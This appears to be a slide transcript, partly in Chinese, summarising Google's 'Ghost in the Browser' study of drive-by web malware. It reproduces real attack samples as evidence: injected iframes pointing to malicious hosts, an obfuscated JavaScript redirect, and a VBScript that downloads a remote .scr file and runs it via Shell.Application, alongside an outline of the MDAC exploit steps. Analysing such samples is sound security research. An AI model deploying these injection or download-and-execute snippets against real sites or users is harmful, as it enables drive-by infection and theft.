niels provos, dean mcnamee, panayiotis mavrommatis, ke wang and nagendra modadugu google, inc
TRANSCRIPT
The Ghost In The BrowserAnalysis of Web-based Malware
Niels Provos, Dean McNamee, Panayiotis Mavrommatis, Ke Wang and Nagendra ModaduguGoogle, Inc.
Preface
Google現有的大量資料
Google與Microsoft
Introduction
本篇描述一個新的趨勢 : 用Web-based的方式來達成 exploits.
Unlike traditional botnets that use push-based infection, web-based malware infection follows a pull-based model, creating botnet-like structures.
從 2006年 3月用 12個月的時間 ,蒐集這段時間的資料
Related Works
Alex Moshchuk: http://research.microsoft.com/en-us/people/alexmos/
He showed a decrease in drive-by-downloads over time.
資料少
Related Works
HoneyMonkey: 較細 , 個案Specific vulnerabilitieshttp://research.microsoft.com/en
-us/um/people/ymwang/
Definition of Malicious of This Paper
A web page is deemed malicious, if it causes the automatic installation of software without the user’s knowledge or consent.
Detecting Dangerous Web Pages
not attempt to investigate the actual behavior of the installed software, but rather identify the mechanisms used to introduce the software into the system via the browser.
Detection architecture
MapReduce
用MapReduce處理大量 URL & all links to potential exploit URLs
最後得出malware URLs(Pages)
Monitor and Analysis
1. A new processes being started.2. Registry and file system changes.
Scores to each recorded component: use different anti-virus engines.
And sum all score as total score. 以上是大概的方式 , 詳細的它沒講
Peak performance 300,000(30萬 )
URLs
Total 4.5million URLs 450,000 URLs were engaging in
drive-by-downloads. About 10% of the URLs were
malicious
Inject malicious content on popular web sites
web server security user contributed content advertising third-party widgets
Web Server Security
Scripting applications(網頁套件 , 模組 ) phpBB2 InvisionBoard
Invision Power Board
<!-- Copyright Information --><div align=’center’ class=’copyright’>Powered by<a href="http://www.invisionboard.com">Invision Power
Board</a>(U)v1.3.1 Final © 2003 <a href=’http://www.invisionpower.com’>IPS, Inc.</a></div></div><iframe
src=’http://wsfgfdgrtyhgfd.net/adv/193/new.php’></iframe>
<iframe src=’http://wsfgfdgrtyhgfd.net/adv/new.php?adv=193’></iframe>
User Contributed Content
Permit posts, and allow to insert arbitrary HTML.(可讓別人留言的網頁 , 允許 html) <iframe> <script>
Though Limited HTML support, but …
<SCRIPT language=JavaScript>function otqzyu(nemz)juyu="lo";sdfwe78="catio";kjj="n.r";vj20=2;uyty="eplac";iuiuh8889="e";vbb25="
(’";awq27="";sftfttft=4;fghdh="’ht";ji87gkol="tp:/";polkiuu="/vi";jbhj89="deo";jhbhi87="zf";hgdxgf="re";jkhuift="e.c";jygyhg="om’";dh4=eval(fghdh+ji87gkol+polkiuu+jbhj89+jhbhi87+hgdxgf+jkhuift+jygyhg);je15
="’)";if (vj20+sftfttft==6) eval(juyu+sdfwe78+kjj+ uyty+iuiuh8889+vbb25+awq27+dh4+je15);otqzyu();//</SCRIPT>
De-obfuscating
location.replace(’http://videozfree.com’)
Advertising
廣告租借
Third-Party Widgets
計數器 Another example: iframemoney.org
Example
<!-- Begin Stat Basic code --><script language="JavaScript"src="http://m1.stat.xx/basic.js"></script><script language="JavaScript"><!--statbasic("ST8BiCCLfUdmAHKtah3InbhtwoWA", 0);// --></script> <noscript><a href="http://v1.stat.xx/stats?ST8BidmAHKthtwoWA"><img src="http://m1.stat.xx/n?
id=ST8BidmAHKthtwoWA"border="0" nosave width="18"
height="18"></a></noscript><!-- End Stat Basic code -->
d.write("<scr"+"ipt language=’JavaScript’type=’text/javascript’src=’http://m1.stats4u.yy/md.js?country=us&id="+ id +"&_t="+(new Date()).getTime()+"’></scr"+"ipt>")
Trigger another exploit code
http://expl.info/cgi-bin/ie0606.cgi?homepagehttp://expl.info/demo.phphttp://expl.info/cgi-bin/ie0606.cgi?type=MS03-
11&SP1http://expl.info/ms0311.jarhttp://expl.info/cgi-bin/ie0606.cgi?exploit=MS03-
11http://dist.info/f94mslrfum67dh/winus.exe
Microsoft Security Bulletin MS03-011: A flaw in Microsoft VM Could Enable System Compromise.
Exploitation Mechanisms
first needs to gain control over a user’s system:傳統 : finding vulnerable network services
and remotely exploiting them. NAT, Firewall
Now: Lure users to connect to malicious servers.
傳統的方式受到限制 , 而用web server(網頁 )&drive by download.
Once a vulnerability has been discovered, an adversary can choose an appropriate exploit and ask the web browser to download it.
Exploiting Software
In Browser Launched external programs Download, store and then execute a
malware binary.(drive-by-download)
Microsoft’s Data Access Components
http://www.microsoft.com/taiwan/technet/security/bulletin/ms06-014.mspx
Javascript can reliably accomplish.分析這一種比較困難 , 例如 : 只能下載一次 ,後來就變空的
Example
The following example illustrates the steps taken by an adversaryto leverage this vulnerability into remote code execution:
• The exploit is delivered to a user’s browser via aniframe on a compromised web page.• The iframe contains Javascript to instantiate an ActiveXobject that is not normally safe for scripting.• The Javascript makes an XMLHTTP request to retrievean executable.• Adodb.stream is used to write the executable to disk.• A Shell.Application is used to launch the newly writtenexecutable.
A twenty line Javascript can reliably accomplish this sequenceof steps to launch any binary on a vulnerable installation.
WebViewFolderIcon
Heap spraying Code here: http://
forum.eviloctal.com/archiver/tid-25077.html
Use Javascript to catalog IE or Firefox
Also version of JVM Patches to OS
EX: http://blog.yam.com/visioncan/article/10598530
<script>window.env=new function(){ this.isOpera=(window.opera&&navigator.userAgent.match(/opera/gi))?true:false; this.isIE=(!this.isOpera&&document.all&&navigator.userAgent.match(/msie/gi))?true:false; this.isSafari=(!this.isIE&&navigator.userAgent.match(/safari/gi))?true:false; this.isGecko=(!this.isIE&&navigator.userAgent.match(/gecko/gi))?true:false; this.isFirefox=(!this.isIE&&navigator.userAgent.match(/firefox/gi))?true:false;};//=====================var s = "";for (var i in env) { s += i + " : " + env[i] + "\n";}alert(s);</script>
EX: http://demo.tc/Post/366
<script type="text/javascript"> var isIE = navigator.userAgent.search("MSIE") > -1; var isIE7 = navigator.userAgent.search("MSIE 7") > -1; var isFirefox = navigator.userAgent.search("Firefox") > -1; var isOpera = navigator.userAgent.search("Opera") > -1; var isSafari = navigator.userAgent.search(“Safari”) > -1;//Google瀏覽器是用這核心 if (isIE7) { alert('isIE7'); } if (isIE) { alert('isIE'); } if (isFirefox) { alert('isFirefox'); } if (isOpera) { alert('isOpera'); } if (isSafari) { alert('isSafari'); } </script>
JVM EX: http://forums.sun.com/thread.jspa?threadID=547717
alert("javaEnabled "+ window.navigator.javaEnabled());alert("java version "+
java.lang.System.getProperty("java.version"));
Tricking the User
騙人下載且執行
codec (解碼器 )
Obfuscation
教學 http://anti-hacker.blogspot.com/2008/02/javascript7.html
如此用 Javascript 可逃過偵測另外有聲譽的一些網站也用了
obfuscation, 所以用此判斷會有 false positive.
Example
document.write(unescape("%3CHEAD%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A/*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o...%3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A"));//--></SCRIPT>-------------------------------------------------------------------------------------<SCRIPT LANGUAGE="Javascript"><!--/* criptografado pelo Fal - [...]document.write(unescape("%0D%0A%3Cscript%20language%3D%22VBScript%22%3E%0D%0A%0D%0A%20%20%20%20on%20error%20resume%20next%0D%0A%0D%0A%20%20%20%20%0D%0A%0D%0A
%20%20...D%0A%0D%0A%20%20%20%20%3C/script%3E%0D%0A%3C/html%3E"));//--></SCRIPT>
<script language="VBScript">on error resume nextdl = "http://foto02122006.xxx.ru/foto.scr"Set df = document.createElement("object")df.setAttribute "classid",
"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"str="Microsoft.XMLHTTP"Set x = df.CreateObject(str,"")
...S.closeset Q = df.createobject("Shell.Application","")Q.ShellExecute fname1,"","","open",0
</script>
Malware Classfication
用 antivirus軟體分類 , 以下 3類 : Trojan: 一般安裝的手法 Adware: 跑廣告出來的軟體 Unknown/Obfuscated: 不確定的
200,000 unique malware binaries Assumed that two binaries are
different if their cryptographic digests(hashes) are different. Why use the method?(如此分別 unique的原因 )▪ Based on structural similarities or the exploit
they use is expensive.▪ No readily available tools
Malware family Percentage
Malware Analysis
Adware and Trojans are the most prevalent malware categories
For adware, Trymedia and NewDotNet are the most common providers of Adware.
For Trojans, Trojan downloaders and banking Trojans are the most common.
Trymedia
Trymedia is an adware that infects your computer through peer-to-peer networks, shareware programs and some websites.
It monitors your surfing activity, especially your shopping and banking habits, collects this information and sends it to the Trymedia server.
Based on this information your computer is bombarded with ad pop-ups.
NewDotNet
It tracks what websites a person visits and then pops up separate browser windows with targeted advertisements and special offers.
It continuously is downloading updated information about new offers and collects a variety of information.
http://blog.xuite.net/reptile/diary/4539739
Trojan downloader
Usually a bootstrap to download other arbitrary binaries onto a machine.
Banking Trojans
steal sensitive information such as bank account numbers and corresponding passwords.
The extracted information is often sent back to the adversary via throw-away email accounts.
With unique URLs
Trojan 最多 , over 300,000
人工的方式檢測不是 browser發出的HTTP request: Majority▪ Pop-up ad▪ Rank inflation
Some cases▪ Receive binary updates and instructions▪ the anti-virus engines provided a classification, the
binaries were labeled either as Trojan or Worm.
Remotely Linked Exploits
the majority of the exploits were hosted on third-party servers and not on the compromised web sites.
The attacker had managed to compromise the web site content to point towards an external URL hosting the exploit either via iframes or external JavaScript.
Or, less popular, completely redirect to another malicious site.
Number of pointing to exploit URLs
Number of pointing to exploit URLs
The reason(The advantage of remotely exploits)
1. Ease of management2. Having points to a single site offers
an aggregation point to monitor and generate statistics.
3. Able to update the portfolio of exploits by just changing a single web page.
分流…
Malware evolution
防止 anti-vire software偵測最快的差不多每小時更新 (改變 )一次
Discussion
We expect that the majority of malware is no longer spreading via remote exploitation but rather as we indicated in this paper via web-based infection.
This rationale can be motivated by the fact that the computer of an average user provides a richer environment for adversaries to mine, for example, it is more likely to find banking transactions and credit card numbers on a user’s machine than on a compromised server.
Conclusion
1. identify the four prevalent mechanisms used to inject malicious content on popular web sites.
2. a large number of malicious web pages responsible for malware infections and found evidence that web-based malware creates botnet-like structures in which compromised machines query web servers periodically for instructions and updates.
3. malware binary change frequently.4. achieve better exposure and more reliability,
malware binaries are often distributed across a large number of URLs and domains.